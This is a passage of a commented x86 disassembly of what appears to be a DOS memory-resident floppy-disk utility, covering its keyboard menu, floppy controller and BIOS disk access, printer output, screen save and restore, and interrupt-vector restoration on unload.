		mov	ah,80h
		iret				; Interrupt return
sub_2		endp


;
;			       SUBROUTINE
;

sub_6		proc	near
loc_38:
		jmp	dword ptr cs:[1A1h]
		mov	byte ptr ds:[22Eh],40h	; '@'
		call	sub_28
		jnc	loc_40			; Jump if carry=0
		clc				; Clear carry flag
loc_39:
		call	sub_11
		jmp	loc_121
loc_40:
		mov	ds,data_25
		test	byte ptr ds:dsk_motor_stat_,0Fh
		push	cs
		pop	ds
		jnz	loc_39			; Jump if not zero
		call	sub_22
		call	sub_23
loc_41:
		mov	ax,55Ch
		mov	cs:data_93,ax
		call	sub_21
		mov	data_112,70h		; 'p'
		call	sub_27
		call	sub_13
loc_42:
		mov	ah,0
		int	16h			; Keyboard i/o  ah=function 00h
						;  get keybd char in al, ah=scan
		cmp	al,1Bh
		je	loc_48			; Jump if equal
		cmp	al,0Dh
		je	loc_49			; Jump if equal
		cmp	ah,48h			; 'H'
		je	loc_50			; Jump if equal
		cmp	ah,50h			; 'P'
		je	loc_53			; Jump if equal
		and	al,0DFh
		cmp	al,50h			; 'P'
		je	loc_43			; Jump if equal
		cmp	al,52h			; 'R'
		je	loc_47			; Jump if equal
		cmp	al,45h			; 'E'
		je	loc_48			; Jump if equal
		cmp	al,53h			; 'S'
		je	loc_44			; Jump if equal
		cmp	al,46h			; 'F'
		je	loc_45			; Jump if equal
		cmp	al,54h			; 'T'
		je	loc_46			; Jump if equal
		call	sub_11
		jmp	short loc_42
loc_43:
		jmp	loc_137
loc_44:
		jmp	short loc_55
		db	90h
loc_45:
		jmp	loc_145
loc_46:
		jmp	loc_149
loc_47:
		jmp	loc_151
loc_48:
		jmp	loc_154
loc_49:
		mov	al,3
		mul	data_107		; ax = data * al
		add	ax,offset loc_43
		jmp	ax			;*Register jump
loc_50:
		mov	data_112,1Fh
		call	sub_27
		cmp	data_107,0
		je	loc_52			; Jump if equal
		dec	data_107
		sub	data_110,3
loc_51:
		mov	data_112,70h		; 'p'
		call	sub_27
		jmp	short loc_42
loc_52:
		mov	data_107,5
		mov	data_110,15h
		jmp	short loc_51
loc_53:
		mov	data_112,1Fh
		call	sub_27
		cmp	data_107,5
		je	loc_54			; Jump if equal
		inc	data_107
		add	data_110,3
		jmp	short loc_51
loc_54:
		mov	data_107,0
		mov	data_110,6
		jmp	short loc_51
loc_55:
		call	sub_19
		mov	data_190,3120h
		cmp	data_28,1
		jne	loc_56			; Jump if not equal
		mov	data_29,0
		jmp	short loc_60
		db	90h
loc_56:
		mov	dh,0Dh
		mov	dl,18h
		mov	si,232h
		call	sub_14
		call	sub_13
		mov	ah,0
		int	16h			; Keyboard i/o  ah=function 00h
						;  get keybd char in al, ah=scan
		cmp	al,1Bh
		jne	loc_57			; Jump if not equal
		jmp	loc_41
loc_57:
		cmp	al,0Dh
		je	loc_60			; Jump if equal
		and	al,0DFh
		sub	al,41h			; 'A'
		jge	loc_59			; Jump if > or =
loc_58:
		call	sub_11
		jmp	short loc_55
loc_59:
		cmp	al,data_28
		jge	loc_58			; Jump if > or =
		mov	data_29,al
		add	al,41h			; 'A'
		mov	byte ptr ds:[24Eh],al	; ('A')
		mov	data_183,al
		mov	data_188,al
loc_60:
		call	sub_19
		call	sub_37
		test	byte ptr [bx],1
		jz	loc_63			; Jump if zero
		mov	dh,10h
		mov	dl,14h
		test	byte ptr [bx],2
		jnz	loc_61			; Jump if not zero
		mov	si,251h
		jmp	short loc_62
		db	90h
loc_61:
		mov	si,27Eh
loc_62:
		call	sub_14
		call	sub_13
		mov	al,31h			; '1'
		mov	data_102,al
		mov	al,[si-3]
		mov	data_103,al
		mov	data_89,1331h
		call	sub_16
		and	byte ptr [si-3],0FEh
		or	[si-3],al
		xor	al,1
		xor	data_31,ax
loc_63:
		mov	ax,data_31
		call	sub_39
loc_64:
		call	sub_20
		mov	dh,0Bh
		mov	dl,14h
		mov	si,2ABh
		call	sub_14
		call	sub_38
		cmp	data_101,0
		je	loc_69			; Jump if equal
		mov	ax,word ptr ds:[137h]
		mov	bx,ax
		cmp	data_101,1
		jne	loc_65			; Jump if not equal
		xchg	bh,bl
		xor	bl,bl			; Zero register
		sub	al,30h			; '0'
		jmp	short loc_67
		db	90h
loc_65:
		sub	al,27h			; '''
		cmp	al,0Ah
		jg	loc_64			; Jump if >
		jz	loc_66			; Jump if zero
		xor	al,al			; Zero register
loc_66:
		sub	ah,30h			; '0'
		add	al,ah
		cmp	al,0Bh
		jg	loc_64			; Jump if >
loc_67:
		cmp	al,0
		je	loc_64			; Jump if equal
		mov	data_96,al
		or	bl,20h			; ' '
		cmp	bl,30h			; '0'
		jne	loc_68			; Jump if not equal
		mov	bl,20h			; ' '
loc_68:
		mov	data_191,bx
		mov	data_182,bx
loc_69:
		mov	data_100,0F5h
		mov	data_95,0
		mov	data_99,0
		call	sub_20
		mov	dh,0Ah
		mov	dl,18h
		mov	si,2DAh
		call	sub_14
		mov	dh,0Ch
		mov	dl,13h
		mov	si,2FBh
		call	sub_14
		call	sub_13
loc_70:
		mov	ah,0
		int	16h			; Keyboard i/o  ah=function 00h
						;  get keybd char in al, ah=scan
		cmp	al,0Dh
		je	loc_72			; Jump if equal
		cmp	al,1Bh
		jne	loc_71			; Jump if not equal
		jmp	loc_41
loc_71:
		call	sub_11
		jmp	short loc_70
loc_72:
		mov	data_82,1525h
		cli				; Disable interrupts
		pushf				; Push flags
		push	cs
		mov	ax,201h
		mov	bx,28E9h
		mov	cx,1
		mov	dl,data_29
		xor	dh,dh			; Zero register
		call	sub_6
		jnc	loc_78			; Jump if carry=0
		clc				; Clear carry flag
		test	ah,80h
		jz	loc_78			; Jump if zero
		call	sub_11
		xor	cx,cx			; Zero register

locloop_73:
		loop	locloop_73		; Loop if cx > 0

		call	sub_11
		call	sub_56
		call	sub_20
		mov	dh,0Ah
		mov	dl,20h			; ' '
		mov	si,3DAh
		call	sub_14
loc_74:
		mov	dh,0Eh
		mov	dl,20h			; ' '
		mov	si,40Fh
		call	sub_14
		call	sub_13
loc_75:
		mov	ah,0
		int	16h			; Keyboard i/o  ah=function 00h
						;  get keybd char in al, ah=scan
		cmp	al,1Bh
		je	loc_77			; Jump if equal
		and	al,0DFh
		cmp	al,52h			; 'R'
		jne	loc_76			; Jump if not equal
		jmp	data_82
loc_76:
		cmp	al,41h			; 'A'
		je	loc_77			; Jump if equal
		call	sub_11
		jmp	short loc_75
loc_77:
		jmp	loc_135
loc_78:
		call	sub_24
		call	sub_61
		or	byte ptr ds:[22Eh],80h
		cli				; Disable interrupts
		call	sub_7
loc_79:
		call	sub_52
		call	sub_60
		mov	data_82,1596h
		call	sub_64
		test	data_73,0C0h
		jz	loc_80			; Jump if zero
		call	sub_64
		test	data_73,0C0h
		jz	loc_80			; Jump if zero
		jmp	loc_123
loc_80:
		call	sub_74
		test	data_73,0C0h
		jz	loc_81			; Jump if zero
		jmp	short loc_83
		db	90h
loc_81:
		cmp	byte ptr ds:[230h],0
		je	loc_82			; Jump if equal
		mov	ax,word ptr ds:[243Dh]
		cmp	data_218,ax
		jne	loc_82			; Jump if not equal
		mov	ax,word ptr ds:[243Fh]
		cmp	data_219,ax
		jne	loc_82			; Jump if not equal
		jmp	loc_117
loc_82:
		cmp	byte ptr data_214,0EBh
		jne	loc_83			; Jump if not equal
		cmp	data_217,200h
		jne	loc_83			; Jump if not equal
		mov	data_84,1626h
		jmp	short loc_84
		db	90h
loc_83:
		mov	data_84,1623h
loc_84:
		call	sub_77
		jnc	loc_85			; Jump if carry=0
		jmp	loc_123
loc_85:
		test	al,40h			; '@'
		jz	loc_87			; Jump if zero
loc_86:
		mov	data_62,3
		jmp	loc_125
loc_87:
		mov	byte ptr ds:[230h],0
loc_88:
		mov	data_82,161Fh
loc_89:
		jmp	data_84
		call	sub_78
		mov	data_68,28E9h
		mov	ax,word ptr data_60
		mov	data_67,ax
		mov	data_69,42h		; 'B'
		mov	data_70,0E6h
		mov	data_85,27F1h
		call	sub_75
		test	data_73,0C0h
		jz	loc_95			; Jump if zero
		test	data_74,20h		; ' '
		jz	loc_90			; Jump if zero
		cmp	data_94,2
		je	loc_93			; Jump if equal
		inc	data_94
		jmp	short loc_91
		db	90h
loc_90:
		mov	data_94,0
loc_91:
		call	sub_65
		test	data_73,0C0h
		jz	loc_92			; Jump if zero
		jmp	loc_123
loc_92:
		mov	data_84,1623h
		jmp	short loc_88
loc_93:
		mov	data_94,0
		cmp	data_65,0
		jne	loc_94			; Jump if not equal
		jmp	loc_105
loc_94:
		call	sub_51
loc_95:
		cmp	data_64,0
		jne	loc_97			; Jump if not equal
		mov	data_64,1
loc_96:
		jmp	short loc_89
loc_97:
		call	sub_9
		mov	data_82,161Fh
		mov	data_64,0
		inc	data_65
		inc	data_63
		cmp	data_31,0
		jne	loc_98			; Jump if not equal
		inc	data_63
loc_98:
		call	sub_46
		cmp	data_63,50h		; 'P'
		jge	loc_99			; Jump if > or =
		call	sub_63
		test	data_73,0C0h
		jz	loc_96			; Jump if zero
		call	sub_65
		test	data_73,0C0h
		jz	loc_96			; Jump if zero
		jmp	short loc_100
		db	90h
loc_99:
		mov	data_65,0
		mov	data_63,0
		mov	data_66,1
		mov	data_64,0
		mov	data_59,0
		call	sub_63
		test	data_73,0C0h
		jz	loc_101			; Jump if zero
		call	sub_65
		test	data_73,0C0h
		jz	loc_101			; Jump if zero
loc_100:
		mov	data_62,40h		; '@'
		jmp	loc_125
loc_101:
		mov	data_82,1712h
		call	sub_78
		cmp	data_64,1
		je	loc_102			; Jump if equal
		mov	data_64,1
		jmp	short loc_101
loc_102:
		call	sub_52
		mov	ds,data_25
		mov	ax,word ptr ds:timer_low_+1
		push	cs
		pop	ds
		mov	word ptr ds:[243Dh],ax
loc_103:
		mov	data_82,1738h
		mov	data_64,0
		mov	data_68,2416h
		mov	data_67,1FFh
		mov	data_69,4Ah		; 'J'
		mov	data_70,0C5h
		mov	data_85,27F1h
		call	sub_75
		test	data_73,0C0h
		jz	loc_106			; Jump if zero
		test	data_74,2
		jz	loc_104			; Jump if zero
		jmp	loc_86
loc_104:
		cmp	data_94,0
		jne	loc_105			; Jump if not equal
		inc	data_94
		call	sub_65
		test	data_73,0C0h
		jz	loc_103			; Jump if zero
		jmp	loc_123
loc_105:
		mov	data_62,20h		; ' '
		jmp	loc_125
loc_106:
		call	sub_53
		mov	byte ptr ds:[21Ah],2
		mov	al,byte ptr ds:[242Bh]
		mov	data_214,al
		mov	data_215,0FFFFh
		mov	word ptr ds:[223h],0
		mov	word ptr ds:[21Fh],0
		mov	word ptr ds:[212h],139h
loc_107:
		mov	cx,80h
		mov	si,word ptr ds:[212h]
loc_108:
		mov	word ptr ds:[218h],cx
		mov	word ptr ds:[214h],si
		call	sub_55
		sub	ax,word ptr ds:[21Fh]
		test	cx,[si]
		jz	loc_113			; Jump if zero
		cmp	ax,200h
		jl	loc_109			; Jump if <
		mov	word ptr ds:[21Bh],ax
		call	sub_49
		call	sub_53
		call	sub_50
		mov	ax,word ptr ds:[21Bh]
		sub	ax,200h
loc_109:
		mov	di,offset data_214
		add	di,ax
		mov	al,data_56
		cbw				; Convrt byte to word
		cmp	al,9
		jne	loc_110			; Jump if not equal
		clc				; Clear carry flag
		rcr	ax,1			; Rotate thru carry
		adc	ax,0
loc_110:
		mov	cx,ax
		mov	si,word ptr ds:[229h]
loc_111:
		mov	bx,225h
		mov	ax,[bx+si]
		mov	bx,[di]
		or	ax,bx
		cld				; Clear direction
		stosw				; Store ax to es:[di]
		xor	si,2
		nop				;*ASM fixup - sign extn byte
		jz	loc_112			; Jump if zero
		dec	di
loc_112:
		dec	cx
		jnz	loc_111			; Jump if not zero
		mov	word ptr ds:[21Dh],di
		jmp	short loc_114
		db	90h
loc_113:
		cmp	ax,200h
		jl	loc_114			; Jump if <
		call	sub_49
		call	sub_53
		call	sub_50
loc_114:
		mov	word ptr ds:[21Bh],ax
		mov	al,data_56
		cbw				; Convrt byte to word
		add	word ptr ds:[223h],ax
		mov	ax,word ptr ds:[21Bh]
		mov	cx,word ptr ds:[218h]
		mov	si,word ptr ds:[214h]
		shr	cx,1			; Shift w/zeros fill
		jz	loc_115			; Jump if zero
		jmp	loc_108
loc_115:
		inc	word ptr ds:[212h]
		mov	ax,word ptr ds:[212h]
		cmp	ax,word ptr ds:[216h]
		je	loc_116			; Jump if equal
		jmp	loc_107
loc_116:
		call	sub_49
		call	sub_54
		mov	di,data_100
		mov	ax,word ptr ds:[243Fh]
		xchg	ah,al
		cld				; Clear direction
		stosw				; Store ax to es:[di]
		mov	ax,word ptr ds:[243Dh]
		xchg	ah,al
		stosw				; Store ax to es:[di]
		mov	ax,word ptr data_98
		stosw				; Store ax to es:[di]
		mov	data_100,di
		inc	data_95
		inc	data_99
		call	sub_12
		mov	al,data_96
		cmp	data_95,al
		je	loc_119			; Jump if equal
loc_117:
		mov	byte ptr ds:[230h],1
		mov	ds,data_25
		mov	byte ptr ds:dsk_motor_tmr_,2
		push	cs
		pop	ds
		mov	data_92,3AAh
		call	sub_45
		mov	cx,88h

locloop_118:
		call	sub_7
		call	sub_9
		mov	cx,word ptr ds:[22Bh]
		mov	data_82,1596h
		loop	locloop_118		; Loop if cx > 0

		jmp	loc_79
loc_119:
		mov	data_92,3C2h
		call	sub_45
		mov	data_107,2
		mov	data_110,0Ch
loc_120:
		mov	data_81,130Dh
		mov	byte ptr ds:[230h],0
		call	sub_8
loc_121:
		and	byte ptr ds:[22Eh],0
		mov	sp,2B84h
		mov	ax,202h
		push	ax
		push	cs
		mov	ax,data_81
		push	ax
		mov	word ptr cs:[1DCh],sp
loc_122:
		mov	ss,word ptr ds:[20Eh]
		mov	sp,word ptr ds:[208h]
		mov	es,word ptr ds:[210h]
		mov	bp,word ptr ds:[20Ah]
		mov	si,word ptr ds:[204h]
		mov	di,word ptr ds:[206h]
		mov	ax,word ptr ds:[1FCh]
		mov	bx,word ptr ds:[1FEh]
		mov	cx,word ptr ds:[200h]
		mov	dx,word ptr ds:[202h]
		mov	ds,word ptr ds:[20Ch]
		iret				; Interrupt return
loc_123:
		mov	byte ptr ds:[22Fh],0
		mov	dx,3F2h
		mov	al,8
		out	dx,al			; port 3F2h, dsk0 contrl output
		cmp	byte ptr ds:[230h],0
		je	loc_124			; Jump if equal
		jmp	loc_117
loc_124:
		mov	data_62,80h
loc_125:
		mov	data_92,3B6h
		call	sub_45
		call	sub_12
		mov	byte ptr ds:[22Dh],6
		call	sub_7
		call	sub_12
		call	sub_8
		mov	data_81,195Dh
		jmp	short loc_121
sub_6		endp

loc_126:
		and	byte ptr cs:[22Eh],7Fh
		call	sub_28
		jnc	loc_128			; Jump if carry=0
		clc				; Clear carry flag
		call	sub_11
		test	byte ptr ds:[22Eh],20h	; ' '
		jnz	loc_127			; Jump if not zero
		jmp	loc_121
loc_127:
		jmp	loc_120
loc_128:
		call	sub_22
		call	sub_23
		call	sub_56
		call	sub_20
		cmp	data_62,80h
		je	loc_129			; Jump if equal
		cmp	data_62,3
		je	loc_132			; Jump if equal
		cmp	data_62,40h		; '@'
		je	loc_131			; Jump if equal
		cmp	data_62,20h		; ' '
		je	loc_130			; Jump if equal
		mov	dh,0Ah
		mov	dl,1Eh
		mov	si,441h
		call	sub_14
		jmp	short loc_133
		db	90h
loc_129:
		mov	dh,0Ah
		mov	dl,20h			; ' '
		mov	si,3DAh
		call	sub_14
		jmp	short loc_133
		db	90h
loc_130:
		mov	dh,0Ah
		mov	dl,18h
		mov	si,420h
		call	sub_14
		jmp	short loc_133
		db	90h
loc_131:
		mov	dh,0Ah
		mov	dl,22h			; '"'
		mov	si,402h
		call	sub_14
		jmp	short loc_133
		db	90h
loc_132:
		mov	dh,0Ah
		mov	dl,1Dh
		mov	si,3EBh
		call	sub_14
loc_133:
		mov	dh,0Eh
		mov	dl,20h			; ' '
		mov	data_62,0
		mov	si,40Fh
		call	sub_14
		call	sub_13
loc_134:
		mov	ah,0
		int	16h			; Keyboard i/o  ah=function 00h
						;  get keybd char in al, ah=scan
		cmp	al,1Bh
		je	loc_135			; Jump if equal
		and	al,0DFh
		cmp	al,52h			; 'R'
		je	loc_136			; Jump if equal
		cmp	al,41h			; 'A'
		je	loc_135			; Jump if equal
		call	sub_11
		jmp	short loc_134
loc_135:
		call	sub_24
		mov	data_107,0
		mov	data_110,6
		jmp	loc_120
loc_136:
		call	sub_24
		cli				; Disable interrupts
		mov	byte ptr ds:[22Eh],0C0h
		call	sub_7
		call	sub_65
		mov	cx,5
		jmp	data_82
loc_137:
		call	sub_19
		mov	dh,0Dh
		mov	dl,15h
		mov	si,457h
		call	sub_14
		call	sub_13
loc_138:
		mov	ah,0
		int	16h			; Keyboard i/o  ah=function 00h
						;  get keybd char in al, ah=scan
		cmp	al,1Bh
		je	loc_144			; Jump if equal
		cmp	al,0Dh
		je	loc_139			; Jump if equal
		call	sub_11
		jmp	short loc_138
loc_139:
		call	sub_19
		mov	dh,0Dh
		mov	dl,21h			; '!'
		mov	si,47Fh
		call	sub_14
		call	sub_13
		mov	bp,0A2Bh
loc_140:
		mov	ah,2
		xor	dx,dx			; Zero register
		int	17h			; Printer  dx=prn1, ah=func 02h
						;  read status, ah=return status
		test	ah,10h
		jz	loc_143			; Jump if zero
		mov	al,[bp]
		cmp	al,0
		je	loc_144			; Jump if equal
		xor	ah,ah			; Zero register
		xor	dx,dx			; Zero register
		int	17h			; Printer  dx=prn1, ah=func 00h
						;  print char al, get status ah
		test	ah,29h			; ')'
		jnz	loc_141			; Jump if not zero
		inc	bp
		jmp	short loc_140
loc_141:
		call	sub_19
		mov	dh,0Ch
		mov	dl,23h			; '#'
		mov	si,48Dh
loc_142:
		call	sub_14
		mov	data_82,1A2Eh
		jmp	loc_74
loc_143:
		call	sub_19
		mov	dh,0Ch
		mov	dl,1Eh
		mov	si,499h
		jmp	short loc_142
loc_144:
		jmp	loc_41
loc_145:
		cmp	data_95,0
		jne	loc_147			; Jump if not equal
		call	sub_19
		mov	dh,0Dh
		mov	dl,20h			; ' '
		mov	si,38Dh
		call	sub_14
loc_146:
		mov	dh,0Fh
		mov	dl,16h
		mov	si,368h
		call	sub_14
		call	sub_13
		jmp	short loc_148
		db	90h
loc_147:
		mov	ax,838h
		mov	cs:data_93,ax
		call	sub_21
		call	sub_31
loc_148:
		mov	ah,0
		int	16h			; Keyboard i/o  ah=function 00h
						;  get keybd char in al, ah=scan
		mov	data_107,5
		mov	data_110,15h
		jmp	loc_41
loc_149:
		cmp	data_187,6666h
		je	loc_150			; Jump if equal
		mov	data_187,6666h
		jmp	loc_41
loc_150:
		mov	data_187,206Eh
		jmp	loc_41
loc_151:
		mov	ax,11E0h
		mov	di,20h			; (' ')
		call	sub_30
		jc	loc_152			; Jump if carry Set
		mov	ax,12E6h
		mov	di,offset data_42
		call	sub_30
		jc	loc_152			; Jump if carry Set
		mov	ax,12CCh
		mov	di,offset data_38
		call	sub_30
		jc	loc_152			; Jump if carry Set
		mov	ax,127Ah
		mov	di,24h			; (' ')
		call	sub_30
		jnc	loc_153			; Jump if carry=0
loc_152:
		clc				; Clear carry flag
		call	sub_19
		mov	dh,0Ch
		mov	dl,8
		mov	si,327h
		call	sub_14
		jmp	loc_146
loc_153:
		xor	ax,ax			; Zero register
		mov	word ptr data_24,ax
		mov	si,offset 195h
		mov	di,20h			; (' ')
		call	sub_29
		mov	si,offset 199h
		mov	di,24h			; (' ')
		call	sub_29
		mov	si,offset 19Dh
		mov	di,offset data_38
		call	sub_29
		mov	si,offset 1A1h
		mov	di,offset data_42
		call	sub_29
		mov	es,data_26
		mov	di,data_2e
		xor	ax,ax			; Zero register
		stosw				; Store ax to es:[di]
		mov	es,data_27
		mov	di,data_2e
		xor	ax,ax			; Zero register
		stosw				; Store ax to es:[di]
		push	cs
		pop	es
		call	sub_24
		call	sub_7
loc_154:
		mov	data_107,0
		mov	data_110,6
		call	sub_24
		jmp	loc_121

;
;			       SUBROUTINE
;

sub_7		proc	near
		add	byte ptr ds:[22Dh],1
		cli				; Disable interrupts
		mov	word ptr ds:[1D0h],ax
		pop	ax
		pushf				; Push flags
		push	cs
		push	ax
		mov	word ptr ds:[1DCh],sp
		mov	word ptr ds:[1D2h],bx
		mov	word ptr ds:[1DAh],ss
		mov	word ptr ds:[1E2h],ds
		mov	word ptr ds:[1E4h],es
		mov	word ptr ds:[1E0h],bp
		mov	word ptr ds:[1D8h],si
		mov	word ptr ds:[1DEh],di
		mov	word ptr ds:[1D4h],cx
		mov	word ptr ds:[1D6h],dx
		jmp	loc_122
sub_7		endp


;
;			       SUBROUTINE
;

sub_8		proc	near
		mov	al,data_29
		cbw				; Convrt byte to word
		mov	di,ax
		mov	ds,data_25
		and	byte ptr ds:hdsk0_media_st_[di],0EFh
		mov	byte ptr ds:dsk_motor_tmr_,2
		mov	byte ptr ds:dsk_recal_stat_,0
		push	cs
		pop	ds
		retn
sub_8		endp


;
;			       SUBROUTINE
;

sub_9		proc	near
		mov	word ptr ds:[22Bh],cx
		test	byte ptr ds:[22Eh],20h	; ' '
		jz	loc_ret_155		; Jump if zero
		pop	ax
		mov	data_82,ax
		jmp	loc_126

loc_ret_155:
		retn
sub_9		endp


;
;			       SUBROUTINE
;

sub_10		proc	near
		mov	ah,0Eh
		mov	bh,0
		int	10h			; Video display   ah=functn 0Eh
						;  write char al, teletype mode
		retn
sub_10		endp


;
;			       SUBROUTINE
;

sub_11		proc	near
		push	ax
		push	bx
		mov	al,7
		call	sub_10
		pop	bx
		pop	ax
		retn
sub_11		endp


;
;			       SUBROUTINE
;

sub_12		proc	near
		call	sub_7
		mov	al,0B6h
		out	43h,al			; port 43h, 8253 wrt timr mode
		mov	ax,180h
		out	42h,al			; port 42h, 8253 timer 2 spkr
		mov	al,ah
		out	42h,al			; port 42h, 8253 timer 2 spkr
		in	al,61h			; port 61h, 8255 port B, read
		or	al,3
		out	61h,al			; port 61h, 8255 B - spkr, etc
		call	sub_7
		in	al,61h			; port 61h, 8255 port B, read
		and	al,0FCh
		out	61h,al			; port 61h, 8255 B - spkr, etc
						;  al = 0, disable parity
		retn
sub_12		endp


;
;			       SUBROUTINE
;

sub_13		proc	near
		mov	ah,2
		mov	dx,2000h
		mov	bh,data_104
		int	10h			; Video display   ah=functn 02h
						;  set cursor location in dx
		retn
sub_13		endp


;
;			       SUBROUTINE
;

sub_14		proc	near
		mov	ah,2
		mov	bh,0
		int	10h			; Video display   ah=functn 02h
						;  set cursor location in dx
		call	sub_15
		retn
sub_14		endp


;
;			       SUBROUTINE
;

sub_15		proc	near
loc_156:
		cld				; Clear direction
		lodsb				; String [si] to al
		cmp	al,0
		je	loc_ret_157		; Jump if equal
		mov	ah,0Eh
		mov	bh,0
		int	10h			; Video display   ah=functn 0Eh
						;  write char al, teletype mode
		jmp	short loc_156

loc_ret_157:
		retn
sub_15		endp


;
;			       SUBROUTINE
;

sub_16		proc	near
loc_158:
		mov	ah,0
		int	16h			; Keyboard i/o  ah=function 00h
						;  get keybd char in al, ah=scan
		cmp	al,1Bh
		jne	loc_159			; Jump if not equal
		pop	ax
		jmp	data_89
loc_159:
		cmp	al,0Dh
		jne	loc_160			; Jump if not equal
		mov	al,data_103
		jmp	short loc_161
		db	90h
loc_160:
		cmp	al,30h			; '0'
		jl	loc_162			; Jump if <
		cmp	al,data_102
		jg	loc_162			; Jump if >
loc_161:
		and	ax,7
		retn
loc_162:
		call	sub_11
		jmp	short loc_158
sub_16		endp


;
;			       SUBROUTINE
;

sub_17		proc	near
		mov	cx,0FA0h
		shr	cx,1			; Shift w/zeros fill
		cld				; Clear direction
		lodsb				; String [si] to al
		inc	si
		xchg	ah,al
loc_163:
		lodsb				; String [si] to al
		dec	cx
		jz	loc_165			; Jump if zero
		inc	si
		cmp	ah,al
		jne	loc_164			; Jump if not equal
		inc	bx
		jmp	short loc_163
loc_164:
		call	sub_26
		jmp	short loc_163
loc_165:
		call	sub_26
		retn
sub_17		endp


;
;			       SUBROUTINE
;

sub_18		proc	near
		push	ds
		push	es
		mov	si,data_1e
		mov	di,data_16e
		mov	bx,0
		mov	ds,cs:data_91
		mov	es,cs:data_91
		call	sub_17
		mov	si,data_2e
		mov	bx,0
		call	sub_17
		pop	es
		pop	ds
		retn
sub_18		endp


;
;			       SUBROUTINE
;

sub_19		proc	near
		mov	ax,4ADh
		mov	data_93,ax
		call	sub_21
		retn
sub_19		endp


;
;			       SUBROUTINE
;

sub_20		proc	near
		mov	ax,6F7h
		mov	data_93,ax
		call	sub_21
		retn
sub_20		endp


;
;			       SUBROUTINE
;

sub_21		proc	near
		push	cx
		push	dx
		push	si
		push	di
		push	ax
		xor	di,di			; Zero register
		mov	si,cs:data_93
loc_166:
		lodsb				; String [si] to al
		cmp	al,1
		jne	loc_169			; Jump if not equal
		lodsw				; String [si] to ax
		mov	cx,ax
		test	cl,80h
		jz	loc_167			; Jump if zero
		xchg	ch,cl
		and	cx,7FFFh
		lodsb				; String [si] to al
		jmp	short locloop_168
		db	90h
loc_167:
		xchg	al,ah
		and	cx,7Fh

locloop_168:
		call	sub_25
		loop	locloop_168		; Loop if cx > 0

		jmp	short loc_170
		db	90h
loc_169:
		call	sub_25
loc_170:
		cmp	di,0FA0h
		jl	loc_166			; Jump if <
		jnz	loc_171			; Jump if not zero
		mov	di,1
		jmp	short loc_166
loc_171:
		pop	ax
		pop	di
		pop	si
		pop	dx
		pop	cx
		retn
sub_21		endp


;
;			       SUBROUTINE
;

sub_22		proc	near
		push	ds
		mov	ds,data_91
		mov	si,data_4e
		mov	di,offset data_115
		mov	cx,7
		cld				; Clear direction
		repe	cmpsw			; Rep zf=1+cx >0 Cmp [si] to es:[di]
		pop	ds
		cmp	cx,0
		jne	loc_ret_172		; Jump if not equal
		mov	data_92,0D5h
		call	sub_44

loc_ret_172:
		retn
sub_22		endp


;
;			       SUBROUTINE
;

sub_23		proc	near
		mov	ah,0Fh
		int	10h			; Video display   ah=functn 0Fh
						;  get state, al=mode, bh=page
						;   ah=columns on screen
		mov	ah,3
		int	10h			; Video display   ah=functn 03h
						;  get cursor loc in dx, mode cx
		mov	data_104,bh
		mov	data_105,cx
		mov	data_106,dx
		call	sub_18
		retn
sub_23		endp


;
;			       SUBROUTINE
;

sub_24		proc	near
		mov	data_93,1000h
		mov	ax,data_91
		push	ds
		mov	ds,ax
		call	sub_21
		pop	ds
		mov	bh,data_104
		mov	dx,data_106
		mov	ah,2
		int	10h			; Video display   ah=functn 02h
						;  set cursor location in dx
		mov	ah,1
		mov	cx,data_105
		int	10h			; Video display   ah=functn 01h
						;  set cursor mode in cx
		retn
sub_24		endp


;
;			       SUBROUTINE
;

sub_25		proc	near
		push	es
		mov	es,cs:data_91
		mov	dx,cs:data_90
		cli				; Disable interrupts
		push	ax
loc_173:
		in	al,dx			; port 0, DMA-1 bas&add ch 0
		test	al,1
		jnz	loc_173			; Jump if not zero
loc_174:
		in	al,dx			; port 0, DMA-1 bas&add ch 0
		test	al,1
		jz	loc_174			; Jump if zero
		pop	ax
		mov	es:[di],al
		sti				; Enable interrupts
		inc	di
		inc	di
		pop	es
		retn
sub_25		endp


;
;			       SUBROUTINE
;

sub_26		proc	near
		cmp	ah,1
		je	loc_175			; Jump if equal
		cmp	bx,0
		je	loc_178			; Jump if equal
		cmp	bx,1
		jne	loc_175			; Jump if not equal
		xor	bx,bx			; Zero register
		xchg	ah,al
		stosb				; Store al to es:[di]
		jmp	short loc_179
		db	90h
loc_175:
		push	ax
		inc	bx
		mov	al,1
		stosb				; Store al to es:[di]
		mov	ax,bx
		and	bx,0FF80h
		nop				;*ASM fixup - sign extn byte
		jz	loc_176			; Jump if zero
		or	ax,8000h
		xchg	ah,al
		stosw				; Store ax to es:[di]
		jmp	short loc_177
		db	90h
loc_176:
		stosb				; Store al to es:[di]
loc_177:
		xor	bx,bx			; Zero register
		pop	ax
loc_178:
		xchg	ah,al
loc_179:
		stosb				; Store al to es:[di]
		retn
sub_26		endp


;
;			       SUBROUTINE
;

sub_27		proc	near
		mov	al,data_110
		mul	data_111		; ax = data * al
		add	ax,3Dh
		mov	di,ax
		mov	al,data_112
		mov	cl,15h
loc_180:
		call	sub_25
		dec	cl
		cmp	cl,0
		jne	loc_180			; Jump if not equal
		retn
sub_27		endp


;
;			       SUBROUTINE
;

sub_28		proc	near
		mov	ds,data_25
		cmp	byte ptr ds:video_mode_,7
		je	loc_183			; Jump if equal
		cmp	byte ptr ds:video_mode_,2
		je	loc_182			; Jump if equal
		cmp	byte ptr ds:video_mode_,3
		je	loc_182			; Jump if equal
loc_181:
		push	cs
		pop	ds
		stc				; Set carry flag
		retn
loc_182:
		push	cs
		pop	ds
		clc				; Clear carry flag
		retn
loc_183:
		mov	ds,cs:data_91
		xor	si,si			; Zero register
		mov	cx,50h
		xor	bx,bx			; Zero register
		cld				; Clear direction

locloop_184:
		lodsw				; String [si] to ax
		cmp	ah,al
		jne	loc_185			; Jump if not equal
		inc	bx
loc_185:
		loop	locloop_184		; Loop if cx > 0

		cmp	bx,0Ah
		jg	loc_181			; Jump if >
		jmp	short loc_182
sub_28		endp


;
;			       SUBROUTINE
;

sub_29		proc	near
		mov	cx,2
		mov	es,data_25
		cld				; Clear direction
		cli				; Disable interrupts
		rep	movsw			; Rep when cx >0 Mov [si] to es:[di]
		sti				; Enable interrupts
		retn
sub_29		endp


;
;			       SUBROUTINE
;

sub_30		proc	near
		clc				; Clear carry flag
		mov	word ptr ds:[1F0h],es
		mov	es,data_25
		cmp	ax,es:[di]
		jne	loc_186			; Jump if not equal
		push	cs
		pop	ax
		cmp	ax,es:[di+2]
		je	loc_187			; Jump if equal
loc_186:
		stc				; Set carry flag
loc_187:
		mov	es,word ptr ds:[1F0h]
		retn
sub_30		endp


;
